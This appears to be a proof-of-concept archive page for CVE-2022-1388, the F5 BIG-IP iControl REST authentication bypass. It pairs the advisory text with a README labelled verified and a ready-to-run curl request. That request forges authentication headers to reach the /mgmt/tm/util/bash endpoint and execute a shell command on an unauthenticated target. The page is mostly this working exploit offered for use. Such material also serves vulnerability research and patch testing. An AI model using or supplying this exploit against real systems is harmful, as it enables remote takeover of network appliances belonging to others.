Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
Readme
# CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388



# Usage 

* This POC is Verified!

![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/rce.jpeg?raw=true)
![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/pic.jpeg?raw=true)

```
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
    --data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
    $'https://IP_HERE/mgmt/tm/util/bash'
 ```


# Reference 

https://twitter.com/1ZRR4H/status/1522150111429726209
https://twitter.com/AnnaViolet20/status/1523564632140509184
File Snapshot

[4.0K] /data/pocs/7ae4d9b762eaa376d73079ebd2fb81a333a02f99 ├── [ 716] bigip-icontrol-rest-rce.yaml ├── [ 449] f5-icontrol-rest-api-auth-bypass.yaml ├── [ 92K] pic.jpeg ├── [113K] rce.jpeg └── [ 702] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →